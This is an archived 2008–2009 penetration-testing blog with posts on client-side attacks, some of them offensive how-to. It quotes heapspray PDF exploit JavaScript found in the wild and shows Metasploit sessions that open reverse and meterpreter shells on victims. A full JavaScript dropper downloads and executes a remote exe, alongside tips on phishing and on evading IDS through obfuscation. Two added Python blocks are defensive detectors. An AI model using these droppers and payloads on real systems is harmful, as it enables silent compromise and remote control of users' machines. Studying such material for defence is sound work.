
Wednesday, May 20, 2009

Client-Side Penetration Testing Notacon Edition

Here's the video from the Notacon talk. Audio sucks, sorry...blame the video guy.

Full Scope Security Attacking Layer 8: Client-Side Penetration Testing Notacon '09 Edition from FullScopeSecurity on Vimeo.

Monday, April 20, 2009

How do YOU defend against 0day?!

There is an interesting thread over on DailyDave about 0day and what you can do about it.

It's far from complete, so go read the thread and come back...

http://lists.immunitysec.com/pipermail/dailydave/2009-April/thread.html#5673

Thus far Ron Gula's response is the best.

My thoughts on this are that it really depends a lot on the maturity of the environment. Most environments wouldn't stand a chance against even a crappy targeted client-side attack with public vulnerabilities. If you throw in 0day...forget about it. But assuming a mature environment, I think you use 0day to test your defenses against targeted and 0day attacks.

Does one 0day totally own your network?

I think using 0day allows you to test:
Are things segregated properly enough that someone popping a shell on a workstation can't get access to "what makes you money"?
Does your HIPS/HIDS stop that stack/heap overflow? Does it stop you from putting new binaries on the box for post exploitation?
Is your AV worth anything? How long before 0day (that eventually becomes public) becomes an AV alert?
Does your network IPS/IDS detect or block the exploit traffic?
Can you detect the outbound traffic? And RESPOND?!
Are your users running with elevated privileges or are your admins doing their regular work with their admin accounts?

that sort of thing...thoughts?

Back from Notacon

g0ne and I just got back from presenting on Client-Side Attacks at Notacon. You can check out his write up here. I have pretty much the same things to say.

It was definitely a unique con, especially since it was more "everything tech" than hardcore security...so like g0ne said we ended up with lots of down time in between talks we were interested in. We spent a bit of time in the lockpick village so that was fun. I usually don't have time to do that stuff because I have talks I want to see.

that's about it...

Up next ChicagoCon in May. I'll also be up there for the Social Engineering Master Class so I'm excited about that.

-CG

Monday, March 16, 2009

Attacking Layer 8: Client-Side Penetration Testing SOURCE Boston Edition

Here's the video from our Client-Side talk at SOURCE Boston 2009



Full Scope Security Attacking Layer 8: Client-Side Penetration Testing SOURCE Boston Edition from FullScopeSecurity on Vimeo.

PDF Exploits now with Heapspray

So right after the latest Adobe 0-day was found in the wild and was seen to be using heapspraying as part of the exploit and payload delivery, I noticed a change in the other Adobe exploits doing the rounds. Both the Adobe printf() and collectEmailInfo() exploits are now taking advantage of heapspraying. I guess it makes sense considering that most, if not all, of the pdf exploits are being delivered via a link rather than an attachment. The browser will render the pdf within the window and so heapspraying will work nicely. This does limit it to IE though.

Another interesting change is that I'm seeing both exploit vectors in a single pdf. A quick visit to hxxp://skalty.com/qqa/paf.php returned a pdf with the following JavaScript:
----
function fix_it(yarsp, len)
{
while (yarsp.length*2
yarsp = yarsp.substring(0,len/2);
return yarsp;
}
var version = app.viewerVersion;
if (version > 8)
{
var payload = unescape("%u0A0A%u0A0A%u0A0A"+"%uE1D9%u34D9%u5824...snip...");
nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")
heapblock = nop + payload;
bigblock = unescape("%u0A0A%u0A0A");
headersize = 20;
spray = headersize+heapblock.length;
while (bigblock.length
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < block ="" mem =" new" i="0;i<1400;i++)">
var num = 12999999999999999999888888...snip...;
util.printf("%45000f",num);
}
else
{
var addkk = unescape("%u0A0A%u0A0A%u0A0A"+"%uE1D9%u34D9....snip...");

var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = addkk.length * 2;
var len = addr - (sc_len+0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 0x400000)/addr;

for (var count=0;count<count2;count++)
{
mem_array[count] = yarsp + addkk;
}
var overflow = unescape("%u0c0c%u0c0c");
while(overflow.length <>
this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
}
this.kasp]ac();
----
Nothing new really but it's always interesting to see how the exploits and their delivery mechanisms evolve.

Monday, March 9, 2009

Presentation on Client-Side Attacks at SOURCE Boston

Alright, it's time for SOURCE Boston!

I'm happy to announce that g0ne and I will be there presenting on:

Attacking Layer 8: Client-Side Penetration Testing

We'll be talking about why you should be allowing your penetration testers to use client-side attacks during their assessments, how to use the metasploit framework to deliver client-side attacks with demos (yes, other tools do CS attacks but we're poor), and some remediations for client-side attacks.

It will be an extra special big day because we'll be presenting as Full Scope Security, our new security consultancy. More on that later.

If you're not going to make it to SOURCE, we will also be at Notacon 16-19 April 09
http://www.notacon.org and ChicagoCon 8-9 May 09 http://www.chicagocon.com

Friday, February 20, 2009

MS09_002 Memory Corruption Update

CG just pushed the code to the Metasploit trunk so go run 'svn update' and enjoy. Any feedback would be good. I'll writeup a little something on it and how the vuln is triggered too when I get a chance.

Wednesday, February 18, 2009

MS09_002 Memory Corruption Exploit

Details to follow. :-)

msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
msf exploit(ms09_002) > set LHOST 10.10.10.15
LHOST => 10.10.10.15
msf exploit(ms09_002) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ms09_002) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms09_002) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002) >
[*] Handler binding to LHOST 10.10.10.15
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/ie7.html
[*] Local IP: http://10.10.10.15:80/ie7.html
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.10.1:1865...
[*] Command shell session 1 opened (10.10.10.15:1701 -> 10.10.10.1:4387)

Wednesday, January 14, 2009

Serving Up Malware via Ad Networks

So it's nothing new to serve up exploits via ad networks, but I thought it was cool that someone was serving up a pdf exploit via the Ad Network.

From http://www.curse.com/forums/t/69161.aspx

"I was looking at GridManaBars when Avast popped up a virus, 3 times. Twice on the addon's page, and once on the download page. I just viewed the page again, but nothing there.

Here's Avast's log.

12/2/2008 7:11:31 PM SYSTEM 1132 Sign of "JS:Packed-T [trj]" has been found in "hxxp://76.74.154.110/zv00108/pdf.php?id=9702&vis=1" file.
12/2/2008 7:11:31 PM SYSTEM 1132 Sign of "JS:Packed-T [trj]" has been found in "hxxp://76.74.154.110/zv00108/pdf.php?id=9702" file.
12/2/2008 7:11:50 PM SYSTEM 1132 Sign of "JS:Packed-T [trj]" has been found in "hxxp://76.74.154.110/zv00108/pdf.php?id=9702&vis=1" file. "

The URL looks similar from what I recall; it's traced back to valuepromo.net. Ad banners I assume?

A robtex lookup of that IP gives you two others in the valuepromo network:

76.74.154.110 server2.valuepromo.net
76.74.239.45 server3.valuepromo.net
76.74.239.143 server1.valuepromo.net

http://www.robtex.com/dns/qiweroqw.com.html

Google for those IPs and you'll see all kinds of people complaining about AV alerts and browser crashes.

The best stuff is here though

http://forums.techpowerup.com/showthread.php?t=81570

"
http://76.74.154.110/zyyqoeiwrueq/pdf.php?id=14273&vis=1

i'm sitting at techpowerup.com homepage and it takes me to this ^^ and brings me to a blank pdf document.... about 6 hours ago today, at techpowerup's homepage, it opened up acrobat reader (outside of firefox) with a blank document...."

Opens up a blank pdf, yeah that's not good...

On a more fun note, think of the damage you could do to a competitor ad network by getting them to serve up malware and getting their whole netblock blocked? Good stuff.

Tuesday, January 13, 2009

Winzip FileView ActiveX Exploit

It's not new at all [CVE-2006-5198] but I noticed that MSF did not have any coverage for Winzip's vulnerable ActiveX methods and the PoCs that I found did not work for me, so I put this together last night. The great thing about Winzip is that, like Adobe Acrobat, no one updates it. :-)

[1] WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX

So run 'svn update' and have fun.

Cheers,
/dean

Thursday, January 8, 2009

More exploits pls.

mc committed 5 exploit modules I'd put together, 2 browser & 3 fileformat, to the metasploit trunk the other day. Just run 'svn update' to update your install with them. The five are:

[1] CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow
[2] VeryPDF PDFView OpenPDF ActiveX OpenPDF Heap Overflow
[3] DjVu DjVu_ActiveX_MSOffice.dll ActiveX Component Buffer Overflow
[4] Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit
[5] SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow

Cheers,
Dean

Sunday, January 4, 2009

MSF VBA payload Demo

Pretty good demo by Mark Baggett using the MSF Payload with VBA output and creating a malicious word document.

http://markremark.blogspot.com/2009/01/metasploit-visual-basic-payloads-in.html

It's a shame everyone can do this now, it's been ol' reliable for quite a while :-(

Thursday, December 11, 2008

Internet Explorer 7 XML Parser Buffer Overflow

So this has been an interesting week. Lots of new botnets to dig around in, a bunch of new malware sites making a new effort to obfuscate their code and one 0day [whatever that means].

A few days ago I saw the code for the new IE7 exploit floating around a few malware sites I found. Great timing on the part of the authors to release it right around MS's Patch Tuesday. I looked at it briefly on Tuesday but never got to spend much time figuring it out. It's pretty straightforward though. If you want to know more about how it works then HD Moore has an excellent writeup on it here.

Basically the vuln is in how the SPAN tags format the datasource referenced by the XML, causing a heap corruption. See HD's post for the exact details. Every time I add code to my posts it screws something up. So no code showing this!

Yesterday while looking at the exploit I saw a PoC posted to Milw0rm. Very cool but in my testing it really was not stable [for me at least] and only triggered the vuln about 70% of the time. I think this has to do with how the blocks of memory on the heap are being allocated/deallocated by the JavaScript heapspray code. I could be wrong though.

So I figured I'd port it over to Metasploit as a module and hopefully get it a little more stable. Way more fun to have multiple payloads to choose from. :) I got an initial PoC working but it was not stable and only triggered on XP as the return pointer for XP was hardcoded into the module. Enter mc. As usual mc was already working on it, so we started going back and forth trying to get this exploit stable and working on multiple targets. mc started by using metasm to generate the return pointers. Very cool! I've never done that before and it's pretty damn cool to use it. He also added target detection based on user-agent string. Awesome! Now we can target specific OS versions with the same exploit.

Even though I tested last night and this morning, it seemed to be hit or miss with XP. Arg! Finally I decided to redo the heapspray code to use what I've been working with lately. By dynamically determining the block size to allocate to the heap the exploit seems far more stable. So this morning I redid the heapspray code and got it to fire 100% of the time on XP. Go me! mc tested Vista and got the same results! Hell Yea!

We ran into some issues with obfuscating the code though. Interestingly enough if the variables are randomized and over a certain length the exploit won't trigger. A few other areas of the code gave issues as well when being obfuscated but it seems the exploit is pretty stable as of now.

I guess I should do a video of the module since Chris has started that trend but in the interim...

msf > use exploit/windows/browser/ie_xmlparser
msf exploit(ie_xmlparser) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_xmlparser) > set LPORT 2244
LPORT => 2244
msf exploit(ie_xmlparser) > set LHOST 10.10.11.13
LHOST => 10.10.11.13
msf exploit(ie_xmlparser) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ie_xmlparser) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 10.10.11.13
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/ie7.html
[*] Local IP: http://10.10.11.13:8080/ie7.html
[*] Server started.
msf exploit(ie_xmlparser) >

[*] Target is Windows XP
[*] Sending Internet Explorer 7 XML Parser Buffer Overflow to 10.10.10.12:1059...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.

[*] Meterpreter session 1 opened (10.10.11.13:2244 -> 10.10.10.12:1060)
msf exploit(ie_xmlparser) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VM-XP-SP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >

Working with mc on getting this module to run was educational to say the least. I learned a lot from the debugging and testing. Cheers mc!!

Now all I need is a target... ;)

Cheers,
/dean

**edit
IE7 Zero Day Technical Analysis


Friday, November 21, 2008

Metasploit Adobe util.printf() Client-side Exploit Video

A little video on using the fileformat mixin to exploit the adobe util.printf() vulnerability.

Sorry, no audio. You'll just have to follow along.


Metasploit adobe util.printf() client-side exploit from carnal0wnage on Vimeo.

**P.S. something is jacked on Vimeo and the video is playing 2x too fast. Start the vid, pull the slider back to the beginning and hit play again and it should play at the proper speed. You can also click the link below the video for a bigger view.

Friday, November 14, 2008

Link: Writing malicious macros using metasploit

Good blog post over at securiteam on using the exe2vba portion of metasploit to embed malicious code into office documents. Fun!

http://blogs.securiteam.com/index.php/archives/1161

Of course those attacks can be mitigated with proper group policy but most places "need their macros!" so enjoy the pwnings.

Wednesday, October 22, 2008

Malware targeting industrial control software(?)

So this morning I was doing my usual malware roundup and looking for anything new or vaguely interesting. Lots of the usual sites all serving the same thing. The pdf exploit (I've a special fondness for this one, see the pentesting failures post), the snapshot_viewer_activex exploit, ms08_053, realplayer11, ms08_011, ms06_014 and a few others. All pretty popular right now.

Then I saw a site that has been floating around serving up malware for a while now. It's been up for about a year I think. It's always had a nice index.htm page with a list of iframes serving up all of the above and some others. I generally have a quick look every now and again and find it's always the same stuff. Lots of reuse of exploits, etc...

Today was a surprise as I found something 'new'. The page has another exploit added. Nothing new about that but it's what the exploit is for that is surprising.

hxxp://www.wackystone.com/counter/IConics.htm

In August a stack overflow exploit in the Iconics Vessel ActiveX control was released. The exploit is in the dlgwrapper.dll [Dialog Wrapper Module ActiveX control]. Tebo and kf wrote a Metasploit exploit module for it. [http://www.milw0rm.com/exploits/6570].

Iconics makes plant automation software for various industries including oil, gas, pharma, airports, etc... SCADA anyone?

A quick decode of the ucs2 encoded payload reveals:

hxxp://www.wackystone.com/counter/taskmgr.exe

The exploit downloads taskmgr.exe, a dropper that installs a second stage piece of malware. I've not downloaded that as yet so I don't know the actual payload or its function.
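As an added example for analysts (not code from this post, the heapspray post above, or any of the samples they describe), the Python below does the two manual steps those posts mention: it decodes the %u-encoded (UCS-2) payload the way Acrobat's unescape() lays it out in memory so embedded strings such as a second-stage URL become readable, and it flags the heapspray sleds and abused Acrobat calls (util.printf with a huge width, Collab.collectEmailInfo, app.viewerVersion branching) seen in the two-vector PDF. The sample JavaScript, URL and shellcode bytes are constructed.

```python
"""Static triage of JavaScript carved out of a malicious PDF.

Decodes %uXXXX / %XX literals the way Acrobat's unescape() lays them out in
memory, so strings buried in the shellcode (a download URL, a file name) become
readable, and flags the heapspray and API-abuse indicators the posts describe.
The sample below is constructed; the URL and shellcode bytes are invented.
"""
import re
from typing import Any, Dict, List

# Acrobat JavaScript APIs the posts show being abused (app.viewerVersion only
# selects which of the two vectors to fire).
SUSPICIOUS_CALLS = ("util.printf", "Collab.collectEmailInfo", "app.viewerVersion")
UNESCAPE_LITERAL = re.compile(r'unescape\(\s*((?:"[^"]*"\s*\+?\s*)+)\)')
STRING_PIECE = re.compile(r'"([^"]*)"')
CODE_UNIT = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})')
PRINTABLE_RUN = re.compile(rb'[\x20-\x7e]{6,}')
URL = re.compile(rb'https?://[\x21-\x7e]+')
PRINTF_WIDTH = re.compile(r'util\.printf\(\s*"%(\d+)f"')


def js_unescape_bytes(literal: str) -> bytes:
    """Bytes that unescape(literal) occupies in memory: UTF-16LE code units."""
    out = bytearray()
    for hi4, lo2 in CODE_UNIT.findall(literal):
        if hi4:                         # %uXXXX -> one code unit, low byte first
            v = int(hi4, 16)
            out += bytes((v & 0xFF, v >> 8))
        else:                           # %XX -> Latin-1 char, still two bytes
            out += bytes((int(lo2, 16), 0))
    return bytes(out)


def analyze_pdf_js(js: str) -> Dict[str, Any]:
    """Split unescape() literals into sleds and payload, then pull indicators."""
    sleds: List[str] = []
    payload = bytearray()
    for m in UNESCAPE_LITERAL.finditer(js):
        literal = "".join(STRING_PIECE.findall(m.group(1)))   # join "a"+"b" pieces
        units = [u.upper() for u, _ in CODE_UNIT.findall(literal) if u]
        if units and len(set(units)) == 1:
            # One code unit repeated (0A0A, 0C0C, 9090): a sled or heap filler.
            if "%u" + units[0] not in sleds:
                sleds.append("%u" + units[0])
        else:
            payload += js_unescape_bytes(literal)
    widths = [int(w) for w in PRINTF_WIDTH.findall(js)]
    return {
        "sleds": sleds,
        "payload_len": len(payload),
        "strings": [s.decode("ascii") for s in PRINTABLE_RUN.findall(payload)],
        "urls": [u.decode("ascii") for u in URL.findall(payload)],
        "calls": [c for c in SUSPICIOUS_CALLS if c in js],
        "printf_width": max(widths, default=0),
    }


def is_likely_exploit(report: Dict[str, Any]) -> bool:
    """A sled plus either an absurd printf width or the Collab call."""
    return bool(report["sleds"]) and (
        report["printf_width"] > 1000 or "Collab.collectEmailInfo" in report["calls"])


def _encode_unescape(data: bytes) -> str:
    """%uXXXX-encode bytes; used here only to build the constructed sample."""
    if len(data) % 2:
        data += b"\x00"
    return "".join("%%u%02X%02X" % (data[i + 1], data[i]) for i in range(0, len(data), 2))


# Constructed sample modelled on the two-vector PDF in the heapspray post.
_FAKE_SHELLCODE = b"\xd9\xe1\xd9\x34\x24\x5b\x31\xc9" + b"http://dropper.example/stage2.exe\x00"
SAMPLE_JS = (
    'var version = app.viewerVersion;\n'
    'if (version > 8) {\n'
    '  var payload = unescape("%u0A0A%u0A0A%u0A0A"+"' + _encode_unescape(_FAKE_SHELLCODE) + '");\n'
    '  nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");\n'
    '  util.printf("%45000f", num);\n'
    '} else {\n'
    '  var yarsp = unescape("%u9090%u9090");\n'
    '  var overflow = unescape("%u0c0c%u0c0c");\n'
    '  this.collabStore = Collab.collectEmailInfo({subj: "", msg: overflow});\n'
    '}\n'
)

if __name__ == "__main__":
    rep = analyze_pdf_js(SAMPLE_JS)
    for key, value in rep.items():
        print(f"{key:13}: {value}")
    print("likely exploit:", is_likely_exploit(rep))
```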

I guess what is interesting to me is that the malware authors have decided to use an exploit that has a somewhat small target audience. I could be wrong as I'm not that familiar with those industries and perhaps the software is really widespread.

/dean

Wednesday, August 27, 2008

Owning the Client without an Exploit

So after a long hiatus of no posts I figured it was time to step up and post something that may be of interest to pentesters. In the spirit of continuity to some previous posts about client-side attacks and as a follow up to some discussions that Chris and I have been having, this post will be about Client-side Ownage.

It's nothing groundbreaking but may have a place in your arsenal of tools and attack vectors. What do you do when all those cool client-side attacks in Metasploit fail? Damn those companies that patch 3rd party products. As shown in the previous posts it's still possible to gather a great deal of information about the remote user, host and network using PHP and some Java but what do you do when you need a foothold on that host to pivot further into the network?

Enter the Dropper. Using JavaScript and Microsoft's XMLHTTPRequest Object it is possible to download and run your backdoor with just a little interaction from the victim. The XMLHTTPRequest Object, a core component of AJAX, provides support for client-side communication with a HTTP server. A user can make use of the XMLHTTP Object to send a request and have the XML DOM parse that request. Great if you have data such as XML that you need to parse and display on a page for example.

What about requesting another file type like, oh I don't know, an exe? This might have some value. :) Let's take a look at a JavaScript function to do just that.

First we need to create our object elements and the required attributes needed to download and execute the file we want:

function dropper() {

var x = document.createElement('object');
x.setAttribute('id','x');
x.setAttribute('classid','clsid:D96C556-65A3-11D0-983A-00C04FC29E36');

try {
var obj = x.CreateObject('msxml2.XMLHTTP','');
var app = x.CreateObject('Shell.Application','');
var str = x.CreateObject('ADODB.stream','');

We use document.createElement to create an element and use it in conjunction with setAttribute to modify the attributes of each new element. The classid in use is a Remote Data Service object. It allows the execution of code from a remote source. Search your registry and you'll see that it is assigned to RDS.DataSpace, a non-visual ActiveX control, which handles remote data connections. This function is part of Microsoft's MDAC.

We create our msxml2.XMLHTTP object which will handle communication with the web server that is hosting our executable.

Then we use the Object element to instantiate a Shell Object which is identified by the CLASSID.

The ADODB.Stream object in ActiveX, which contains methods to manage a stream of binary data or text, is used to handle the storing and saving of the data to a file.

Now let's grab the file, install it to a directory of our choice and run it.

try {
str.type = 1;
obj.open('GET','http://coolsite.com//innocent.exe',false);
obj.send();
str.open();
str.Write(obj.responseBody);
var path = './/..//svchosts.exe';
str.SaveToFile(path,2);
str.Close();
}
catch(e) {}

First we use the Type property to set the type of data in the stream object. 1 is for Binary.

Next we use the XMLHTTPRequest Open Method to initialize an MSXML2.XMLHTTP request, in which we specify the retrieval method, URL and authentication information if any. The XMLHTTPRequest Send Method allows us to send the HTTP request to the server.

The ADODB.stream Open Method is used to create and open a Stream object. The ADODB.stream Write Method is used to write the binary data to a binary Stream object. After specifying the path, we use the ADODB.stream SaveToFile method to save the contents of our open Stream object to a local file of our choosing. In this case we use an option value of 2, which overwrites the file if it already exists. We then close the object.

The next step is to use our Shell Object to execute our newly downloaded executable using the shellexecute function.

try {
app.shellexecute(path);
}
catch(e) {}
}
catch(e) {}
}

Place this code in a webpage either directly or through an include, create a good phishing email (see other posts) and send it off to your victims. Before anyone makes mention that this requires ActiveX to run remember that enough users will allow ActiveX controls to be run for it to be useful. On I.E. 6 this should perform a silent download and on I.E. 7 it will prompt the user.

You can add additional code to the page to check the browser version and prompt the user to either change to IE or have a direct link to the file for the user to click and run. Remember it just takes one user that follows the link to give you access.

One other thing to consider is IDS/IPS evasion. The code above will likely get flagged by an IDS in the form it is now. Look at JavaScript obfuscation techniques such as 'string-splitting', arguments.callee() and other methods to evade the IDS or just hide your code.

Variants of this method we have just discussed are actually widely used by malware authors on their sites to drop files onto users systems. Have a look at the next spam email you get and decode the JavaScript on the page.
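From the detection side, as an added example that is not part of the post: a Python scanner for the chain just described (the RDS.DataSpace CLSID together with ADODB.Stream/SaveToFile and Shell.Application/shellexecute) that first undoes the string-splitting and hex-escape tricks mentioned above, so the obfuscated variant is caught as well and plain AJAX is not. The CLSID is the well-known RDS.DataSpace identifier; all three samples are constructed and carry only the indicator-bearing lines.

```python
"""Flag the download-and-execute chain from the post in HTML/JavaScript, after
undoing the string-splitting and hex-escape tricks the post says evade IDS.

Samples are constructed and contain only the indicator-bearing lines; the
CLSID is the well-known RDS.DataSpace identifier.
"""
import re
from typing import Any, Dict, List

RDS_DATASPACE_CLSID = "bd96c556-65a3-11d0-983a-00c04fc29e36"
# Each stage of the chain the post walks through: instantiate, fetch, write, run.
INDICATORS = {
    "rds_dataspace": RDS_DATASPACE_CLSID,
    "xmlhttp": "msxml2.xmlhttp",
    "adodb_stream": "adodb.stream",
    "savetofile": "savetofile",
    "shell_application": "shell.application",
    "shellexecute": "shellexecute",
    "callee_self_check": "arguments.callee",
}
# 'abc' + 'def' (either quote style) -> one literal; applied until nothing changes.
SPLIT_STRING = re.compile(r'''(["'])((?:(?!\1).)*)\1\s*\+\s*(["'])((?:(?!\3).)*)\3''')
HEX_ESCAPE = re.compile(r'(?:\\x|%)([0-9a-fA-F]{2})')


def normalize_js(src: str) -> str:
    """Join split literals, decode \\xNN and %NN escapes, lowercase."""
    prev = None
    while prev != src:
        prev = src
        src = SPLIT_STRING.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), src)
    src = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)
    return src.lower()


def scan_dropper(src: str) -> Dict[str, Any]:
    """Report which indicators appear and whether they form the full chain."""
    norm = normalize_js(src)
    hits: List[str] = [name for name, needle in INDICATORS.items() if needle in norm]
    # XMLHTTP alone is ordinary AJAX; the chain needs an RDS.DataSpace object
    # handing out something that writes to disk and something that runs it.
    writes = "adodb_stream" in hits or "savetofile" in hits
    runs = "shell_application" in hits or "shellexecute" in hits
    return {
        "indicators": hits,
        "obfuscated": norm != src.lower(),
        "dropper": "rds_dataspace" in hits and writes and runs,
    }


# Constructed sample 1: the chain written plainly, as in the post.
PLAIN = """
x.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
var obj = x.CreateObject('msxml2.XMLHTTP','');
var app = x.CreateObject('Shell.Application','');
var str = x.CreateObject('ADODB.stream','');
str.SaveToFile(path, 2);
app.shellexecute(path);
"""
# Constructed sample 2: same chain with split strings and a \\x escape.
SPLIT = """
x.setAttribute('classid','clsid:BD96C556-65A3-' + '11D0-983A-00C04FC29E36');
var app = x.CreateObject('Shell.App' + 'lication','');
var str = x.CreateObject('ADO' + 'DB.str' + 'eam','');
str['\\x53aveToFile'](path, 2);
app['shell' + 'execute'](path);
"""
# Constructed sample 3: ordinary AJAX that must not trip the rule.
BENIGN = """
var req = new ActiveXObject('msxml2.XMLHTTP');
req.open('GET', '/api/items.xml', false); req.send();
document.getElementById('out').innerText = req.responseText;
"""

if __name__ == "__main__":
    for name, sample in (("plain", PLAIN), ("split", SPLIT), ("benign", BENIGN)):
        print(name, scan_dropper(sample))
```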

Cheers,

Saturday, August 23, 2008

Metasploit and File Format Bugs

Client-side attacks are where it's at, and being able to send a legitimate looking file to a user to do their double-clicky thing on is the bomb.

MC has released a FileFormat mixin for metasploit which allows you to exploit fun bugs like 08-011 and other bugs that involve a user opening some sort of attachment.

Here is the link to the fileformat mixin:
http://www.metasploit.com/users/mc/rand/fileformat.rb

To use it, you need to add:

require 'msf/core/exploit/fileformat' to msf3/lib/msf/core/exploit.rb

and stick fileformat.rb in the msf3/lib/msf/core/exploit/ directory

Now, remembering my previous post on adding exploits to metasploit, we can do the same for mixins.

So my exploit.rb file actually said:

require '/home/cg/.msf3/lib/msf/core/exploit/fileformat'

And don't worry, if you jacked something up Metasploit will let you know.

cg@WPAD:~/evil/msf3$ ./msfconsole
./lib/msf/core/exploit.rb:241:in `require': no such file to load --
/home/cg/.msf3/lib/msf/core/exploit/fileformat (LoadError)


For our example we'll use a vulnerability in the ActiveX control for eTrust PestScan
http://www.metasploit.com/users/mc/rand/etrust_pestscan.rb


From the description in the module:

This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.

Example Time!

msf > use exploit/windows/fileformat/etrust_pestscan
msf exploit(etrust_pestscan) > info

Name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
Version: $Revision:$
Platform: Windows
Privileged: No
License: Metasploit Framework License

Provided by:
MC

Available targets:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME MSF no The file name.

Payload information:
Space: 1024
Avoid: 1 characters

Description:
This module exploits a stack overflow in CA eTrust PestPatrol. When
sending an overly long string to the Initialize() property of
ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary
code. This control is not marked safe for scripting, so choose your
attack vector accordingly.

References:
http://www.w00t-shell.net/#
http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm

msf exploit(etrust_pestscan) > show options

Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME MSF no The file name.

Exploit target:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

msf exploit(etrust_pestscan) > set FILENAME DEMO.html
FILENAME => DEMO.html
msf exploit(etrust_pestscan) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(etrust_pestscan) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(etrust_pestscan) > show options

Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME DEMO.html no The file name.

Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
DLL /home/cg/evil/msf3/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.0.101 yes The local address
LPORT 4444 yes The local port

Exploit target:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

msf exploit(etrust_pestscan) > exploit
[*] Started reverse handler
[*] Creating HTML file ...
[*] File is located in ./data/exploits/ ...
msf exploit(etrust_pestscan) >


Fileformat bugs are going to require you to run the multi/handler so you can catch the return shells.

cg@WPAD:~/evil/msf3$ ./msfcli
Usage: ./msfcli [mode]
====================================================
Mode Description
---- -----------
(H)elp You're looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module

cg@WPAD:~/evil/msf3$ ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E
[*] Started reverse handler
[*] Starting the payload handler...

***Work your magic to get the client to open the html file***

[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.103:4360)

meterpreter >

Thursday, August 14, 2008

Metasploit + Karma=Karmetasploit Part 1

HD Moore released some documentation to get karmetasploit working with the framework.

First you'll have to get an updated version of aircrack-ng because you'll need airbase-ng. I had 0.9.1 so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch (I used the 2nd patch), so apply that before you make/make install.

You may also need a current version of the madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall. OK, so you've got an updated version of aircrack, patched airbase-ng, and madwifi drivers and can inject packets? Let's continue.

Let's do our aireplay-ng test to see if things are working:

root@WPAD:/home/cg# aireplay-ng --test ath40
19:55:44 Trying broadcast probe requests...
19:55:44 Injection is working!
19:55:46 Found 5 APs

19:55:46 Trying directed probe requests...
19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'
19:55:52 0/30: 0%

19:55:52 00:14:06:11:42:A2 - channel: 4 - 'VEGAS.com'
19:55:58 0/30: 0%

19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80
19:56:03 5/30: 16%

